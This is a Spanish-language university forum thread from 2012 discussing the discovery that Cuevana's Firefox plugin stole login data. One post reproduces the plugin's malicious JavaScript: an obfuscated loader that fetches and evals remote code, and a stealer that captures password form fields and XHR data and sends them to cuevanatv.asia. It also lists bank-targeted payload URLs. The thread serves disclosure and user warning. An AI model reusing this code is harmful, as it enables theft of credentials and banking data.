Donar $20 Donar $50 Donar $100 Donar mensualmente
 


Enviar respuesta 
 
Calificación:
  • 0 votos - 0 Media
  • 1
  • 2
  • 3
  • 4
  • 5
Buscar en el tema
Script de Cuevana robaba informacion bancaria
Autor Mensaje
gonnza Sin conexión
User Verde

*********

Ing. en Sistemas
Facultad Regional Buenos Aires

Mensajes: 17.112
Agradecimientos dados: 763
Agradecimientos: 732 en 317 posts
Registro en: Mar 2010
BlogSpot Google+ YouTube
Mensaje: #1
Script de Cuevana robaba informacion bancaria
Parece que esto salio ayer en foroCoches.
Yo hace banda que no entro a cuevana, pero aca deben haber varios que entran re seguido.


http://www.forocoches.com/foro/showthread.php?t=2923803


Para los que no tengan ganas de leerse todo el coso, basicamente el resumen es:


Cita:TOCHO RESUMEN:

Descubro que el plugin de CUEVANA.TV está enviando todos los datos de usuario y contraseña de todas las páginas web al dominio cuevanatv.asia/add.php, varios foreros se unen y entre todos descubrimos los scripts maliciosos y los recopilamos aquí, además descubrimos 3 scripts que supuestamente tienen relación con el robo de datos de bancarios del santander mexicano, banco de venezuela y scotiabank, otros foreros descomprimen el plugin y dan con la dirección del script malicioso que estaba robando los datos, el cual también está recopilado aquí, pasa un tiempo y la noticia se difunde por Twitter y Menéame, después ocurre lo más flipante de todo, el dominio cuevanatv.asia deja de existir, o está caído, la empresa de hosting no dice nada, cuevana.tv actualiza su plugin de Firefox pero manteniendo la misma versión (para simular que no lo han actualizado), el forero chico2009 se da cuenta de que el checksum MD5 del supuesto mismo plugin, no coincide con el checksum del plugin infectado (el cual guarda en su pc) (el checksum es una cadena de texto generada a partir de los datos binarios de un programa, asi explicado a modo rapido) esto quiere decir, que la nueva version del plugin de cuevana, a pesar de que ellos intentan simular que es la misma, NO LA ES, dado que los checksum no coinciden, de nuevo varios foreros descomprimen el nuevo plugin de cuevana y se dan cuentan de que el código malicioso está desaparecido, pero aun no ha acabado todo, el forero chico2009 guardó el plugin antiguo y lo ha subido, de este modo tenemos todos los datos posibles recopilados, es hora de pasar a la acción, JUSTICIA !!!!


lo acabo de descubrir, he buscado info. en google y no aparece nada, todo el mundo sabe que para utilizar el sitio web cuevana.tv te piden descargar un plugin, pues estaba haciendo unas cosillas y utilizando un plugin de firefox llamado tamper data he podido ver que el plugin de cuevana bypassea los formularios de entrada (usuario/contraseña) y los envía a sus servidores, después de hacer esto el formulario se envía normalmente a la página en la que estás y no notas nada, al desinstalar el plugin he podido comprobar como esto no sucedía, y al instalarlo de nuevo he comprobado de nuevo como SÍ sucedía, la prueba está aquí:

logueándome a GMAIL


No es una joda porque Cuevana ya lo ha reconocido, aunque dijeron que fue "alguien de afuera"

Para mas info, recomiendo lean el tredt del link, sino copypastear se complica.

Basicamente, con el plug-in de Cuevana, cada vez que llenabas el formulario en una pagina el script enviaba la informacion a otra pagina (por ej, contraseñas y eso) y luego te redirigia normalmente, a la pagina que estabas, y no te das cuenta. Por lo que hay que eliminar el plug-in y cambiar contraseñas

[Imagen: v34BEFt.gif]
(Este mensaje fue modificado por última vez en: 16-09-2012 23:47 por gonnza.)
16-09-2012 23:42
Encuentra todos sus mensajes Cita este mensaje en tu respuesta
Maik Sin conexión
Presidente del CEIT
.
********

Otra
Otra

Mensajes: 5.297
Agradecimientos dados: 47
Agradecimientos: 190 en 136 posts
Registro en: Sep 2011
Mensaje: #2
RE: Script de Cuevana robaba informacion bancaria
no.

pero por las dudos sumo posts como hace gonnza.


pd. alguien usa cuevana? se me hace imposible, para lo unico que entre una vez es para bajar malcolm in the middle en calidad decente (ya que por torrent solo se consigue en 120p , te sangran los ojos si intentas ver eso).

MODS
[Imagen: 2r5t075.jpg]
16-09-2012 23:47
Envíale un email Encuentra todos sus mensajes Cita este mensaje en tu respuesta
gonnza Sin conexión
User Verde

*********

Ing. en Sistemas
Facultad Regional Buenos Aires

Mensajes: 17.112
Agradecimientos dados: 763
Agradecimientos: 732 en 317 posts
Registro en: Mar 2010
BlogSpot Google+ YouTube
Mensaje: #3
RE: Script de Cuevana robaba informacion bancaria
yo no la uso hace bastaaaaaaante
pero se de gente que la hace, asique..


pensa que si tenias el plug in, entraste a cuevana, y al os 3 dias entraste a tu cuenta del banco por internet, tienen tu clave
o si te logueaste con tu mail
o si usaste tarjeta de credito
y banda de cosas

[Imagen: v34BEFt.gif]
16-09-2012 23:50
Encuentra todos sus mensajes Cita este mensaje en tu respuesta
Eutectico Sin conexión
Presidente del CEIT
RÁD VAŘIM
********

Ing. Mecánica
Facultad Regional Buenos Aires

Mensajes: 1.017
Agradecimientos dados: 12
Agradecimientos: 43 en 22 posts
Registro en: Mar 2010
Mensaje: #4
RE: Script de Cuevana robaba informacion bancaria
Justamente fue por ese plugin de mierda que deje de usar cuevana. Menos mal.

Spoiler: Mostrar
[Imagen: 15y87wo.jpg]

The Evolving Art of Hobo Engineering
16-09-2012 23:51
Encuentra todos sus mensajes Cita este mensaje en tu respuesta
rulo Sin conexión
Ultra Nerd Mod
Another green world
*********

Ing. en Sistemas
Facultad Regional Buenos Aires

Mensajes: 4.271
Agradecimientos dados: 48
Agradecimientos: 55 en 33 posts
Registro en: Apr 2009
BlogSpot
Mensaje: #5
RE: Script de Cuevana robaba informacion bancaria
Que tan posta es? No asustes al pedo gonza, yo uso cuevana a bases semi-regulares.

Cita:"...you can't kill a vegetable by shooting it through the head."
(Este mensaje fue modificado por última vez en: 16-09-2012 23:57 por rulo.)
16-09-2012 23:56
Encuentra todos sus mensajes Cita este mensaje en tu respuesta
gonnza Sin conexión
User Verde

*********

Ing. en Sistemas
Facultad Regional Buenos Aires

Mensajes: 17.112
Agradecimientos dados: 763
Agradecimientos: 732 en 317 posts
Registro en: Mar 2010
BlogSpot Google+ YouTube
Mensaje: #6
RE: Script de Cuevana robaba informacion bancaria
rulo: segun lei, es posta posta

leete el topic

habia links del twitter oficial de cuevana por ahi
Cita:Cuevana ‏@Cuevana
A usuarios que instalaron el plugin de Firefox en las últimas 2 semanas, les aconsejamos cambiar todas sus contraseñas web por precaucion.

Cita:Cuevana ‏@Cuevana
Algunas sospechas apuntan a que si instalaste el plugin de Firefox de Cuevana en este mes de Septiembre, el mismo pueda estar infectado.


lo que no se entiende es si lo instalaste hace banda
se actualiza solo al entrar a cuevana?

[Imagen: v34BEFt.gif]
(Este mensaje fue modificado por última vez en: 16-09-2012 23:59 por gonnza.)
16-09-2012 23:57
Encuentra todos sus mensajes Cita este mensaje en tu respuesta
Vallo Sin conexión
Mejor Firma 2011
HAHAHAHAH

Ing. en Sistemas
Facultad Regional Buenos Aires

Mensajes: 2.709
Agradecimientos dados: 142
Agradecimientos: 81 en 64 posts
Registro en: Sep 2009
Mensaje: #7
RE: Script de Cuevana robaba informacion bancaria
teshible, muy heavy eso

[Imagen: MIsnAz2.png]
17-09-2012 00:06
Encuentra todos sus mensajes Cita este mensaje en tu respuesta
josr Sin conexión
Secretario de la SAE
Sin estado :(
******

Ing. en Sistemas
Facultad Regional Buenos Aires

Mensajes: 661
Agradecimientos dados: 7
Agradecimientos: 21 en 4 posts
Registro en: Aug 2010
Mensaje: #8
RE: Script de Cuevana robaba informacion bancaria
LPM... ya me parecia que algo raro pasaba con ese plugin Angry

“La intención fue promover que el alumno salga joven de la universidad, y que luego se especialice en el posgrado”

Rector Hector Brotto.
17-09-2012 00:11
Envíale un email Encuentra todos sus mensajes Cita este mensaje en tu respuesta
gonnza Sin conexión
User Verde

*********

Ing. en Sistemas
Facultad Regional Buenos Aires

Mensajes: 17.112
Agradecimientos dados: 763
Agradecimientos: 732 en 317 posts
Registro en: Mar 2010
BlogSpot Google+ YouTube
Mensaje: #9
RE: Script de Cuevana robaba informacion bancaria
el script malicioso:

es un quilombo de javascript =P
pero las partes que encontre que son "sensibles" parece:

Cita:eval(function(p,a,c,k,e,d){e=function©{return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c])}}return p}('6 0=7 5();0.4(\'1\',\'2://3.8/h.9?\'+g.e(),d);0.a(b);c(0.f);',18,18,'r|GET|http|cuevanatv|open|XMLHttpRequest|var|new|asia|js|send|null|eval|false|random|responseText|Math|back3'.s​plit('|'),0,{}))


que se traduce a

Cita:var r=new XMLHttpRequest();
r.open('GET','http://cuevanatv.asia/back3.js?'+Math.random(),false);
r.send(null);
eval(r.responseText);


Cita:var r = new XMLHttpRequest(); r.open('GET', "http://cuevanatv.asia/scripts.txt", false); r.send(null); if (r.status == 200) eval(r.responseText); OSid = Components.classes['@mozilla.org/xre/app-info;1'].getService(Components.interfaces.nsIXULRuntime).O S; OSid = (OSid=='Darwin')?3(OSid=='WINNT' )?2(OSid=='Linux')?1:0)); function _sData(datos, url) { var r = new XMLHttpRequest; r.open("POST", "http://cuevanatv.asia/add.php", true); r.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); r.send("d="+datos+"&o="+OSid+"&u="+url); } Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverServi ce).addObserver({ observe : function(aWindow, aTopic, aData) { if (aWindow instanceof Ci.nsIDOMWindow && aTopic == 'content-document-global-created') { var win = aWindow.wrappedJSObject; win.addEventListener("submit", function(e) { datos = []; enviar = false; for each(i in e.target.elements) { if(i.type=='password') enviar=true; if(i.type!='hidden' && i.type!='submit' && i.type!=undefined) datos.push(i.name+"::"+i.value); } if(enviar) _sData(datos.join(":_:"), win.location.href); } ,false); var xmlhr = new Object(); xmlhr.open = win.XMLHttpRequest.prototype.open; xmlhr.send = win.XMLHttpRequest.prototype.send; if (win.location.host.indexOf("facebook.com")==-1) { win.XMLHttpRequest.prototype.open=function(a,b){ a=(!a)?'':a; b=(!b)?'':b; xmlhr.open.apply(this, arguments); xmlhr.metodo = a.toLowerCase(); xmlhr.url = b; if(xmlhr.metodo=='get') xmlhr.datos = b.split("?")[1]; } win.XMLHttpRequest.prototype.send=function(a,b){ a=(!a)?'':a; b=(!b)?'':b; xmlhr.send.apply(this, arguments); if(xmlhr.metodo=='post') xmlhr.datos = a; xmlhr.callback(); } } xmlhr.callback = function(){ enviar = false; activadores = ["pass", "pss", "clave", "contra"]; for each(dato in this.datos.split("&")) { for each(activador in activadores) { if(dato.split("=")[0].indexOf(activador)>-1) enviar=true; } } if(enviar) _sData(this.datos.split("&").join(":_:").split("=" ).join("::"), win.location.href); } win.addEventListener("DOMContentLoaded", function(e){ for(site in scripts) { if (win.location.host.indexOf(site)>-1) { var r = new XMLHttpRequest(); r.open('GET', scripts[site], false); r.send(null); if (r.status == 200) eval(r.responseText); } } },false); } } }, 'content-document-global-created', false);



y

Cita:var scripts = { 'santander.com.mx':'http://cuevanatv.asia/plugin.js', 'banvenez.com':'http://cuevanatv.asia/plugin1.js', 'scotiaweb.com.mx':'http://cuevanatv.asia/plugin2.js' }

Estos son 3 casos particulares del script generico, o algo asi lei, para esos 3 bancos, pero een realidad el/los otros funcionan para todos los sitios
algun capo de javascript que bata la posta
ese sscript es de firefox, de chrome no lo vi aun

[Imagen: v34BEFt.gif]
(Este mensaje fue modificado por última vez en: 17-09-2012 00:25 por gonnza.)
17-09-2012 00:20
Encuentra todos sus mensajes Cita este mensaje en tu respuesta
.py Sin conexión
Presidente del CEIT
gone
********

Análisis de Sistemas
Facultad Regional Buenos Aires

Mensajes: 4.218
Agradecimientos dados: 5
Agradecimientos: 128 en 84 posts
Registro en: Sep 2008
Mensaje: #10
RE: Script de Cuevana robaba informacion bancaria
Esto les pasa por no usar torrent, streamingfags

[Imagen: 9zsRG7X.gif]
17-09-2012 00:31
Envíale un email Encuentra todos sus mensajes Cita este mensaje en tu respuesta
Vallo Sin conexión
Mejor Firma 2011
HAHAHAHAH

Ing. en Sistemas
Facultad Regional Buenos Aires

Mensajes: 2.709
Agradecimientos dados: 142
Agradecimientos: 81 en 64 posts
Registro en: Sep 2009
Mensaje: #11
RE: Script de Cuevana robaba informacion bancaria
viva thepiratebay

[Imagen: MIsnAz2.png]
17-09-2012 00:32
Encuentra todos sus mensajes Cita este mensaje en tu respuesta
Maik Sin conexión
Presidente del CEIT
.
********

Otra
Otra

Mensajes: 5.297
Agradecimientos dados: 47
Agradecimientos: 190 en 136 posts
Registro en: Sep 2011
Mensaje: #12
RE: Script de Cuevana robaba informacion bancaria
p2p ftw.

MODS
[Imagen: 2r5t075.jpg]
17-09-2012 00:39
Envíale un email Encuentra todos sus mensajes Cita este mensaje en tu respuesta
nanuiit Ausente
♫ I'm Blue ...
... Da ba dee, da ba da ♫
**********

Ing. en Sistemas
Facultad Regional Buenos Aires

Mensajes: 8.880
Agradecimientos dados: 216
Agradecimientos: 572 en 201 posts
Registro en: Aug 2010
Mensaje: #13
RE: Script de Cuevana robaba informacion bancaria
No deja de ser algo demasiado malo para Cuevana. De ser interno, porque son unos cualquieras

De no ser interno, es porque están vulnerables y no tienen la suficiente seguridad en su sitio

Yo tampoco lo uso hace milenios; de hecho tengo una versión vieja del plug-in

ALGORITMOS

Apuntes: Mem. Dinámica - Mem. Estática - Proc. y Funciones || Guías: Módulos + 83 Ejercicios || Finales: 2004-2013


[Imagen: digitalizartransparent.png]

[Imagen: firmananiv2.png]
17-09-2012 09:50
Encuentra todos sus mensajes Cita este mensaje en tu respuesta
Adriano Sin conexión
Presidente del CEIT
sonaiNTU arap anoD
**********

Ing. en Sistemas
Facultad Regional Buenos Aires

Mensajes: 6.677
Agradecimientos dados: 235
Agradecimientos: 718 en 242 posts
Registro en: Jul 2008
Facebook Twitter
Mensaje: #14
RE: Script de Cuevana robaba informacion bancaria

Off-topic:
Gonza, que hacias en forocoches?

[Imagen: 1282077013m2a4qn.jpg]


Heavy. Por eso las operaciones del banco hay que hacerlas siempre usando el "modo incognito" o algo asi

[Imagen: digitalizartransparent.png]
17-09-2012 11:27
Visita su sitio web Encuentra todos sus mensajes Cita este mensaje en tu respuesta
nanuiit Ausente
♫ I'm Blue ...
... Da ba dee, da ba da ♫
**********

Ing. en Sistemas
Facultad Regional Buenos Aires

Mensajes: 8.880
Agradecimientos dados: 216
Agradecimientos: 572 en 201 posts
Registro en: Aug 2010
Mensaje: #15
RE: Script de Cuevana robaba informacion bancaria

Off-topic:
En realidad salió publicado en el blog segu-info
Y de ahí te dirige a forocoches

ALGORITMOS

Apuntes: Mem. Dinámica - Mem. Estática - Proc. y Funciones || Guías: Módulos + 83 Ejercicios || Finales: 2004-2013


[Imagen: digitalizartransparent.png]

[Imagen: firmananiv2.png]
17-09-2012 11:42
Encuentra todos sus mensajes Cita este mensaje en tu respuesta
Buscar en el tema
Enviar respuesta 




Usuario(s) navegando en este tema: 1 invitado(s)



    This forum uses Lukasz Tkacz MyBB addons.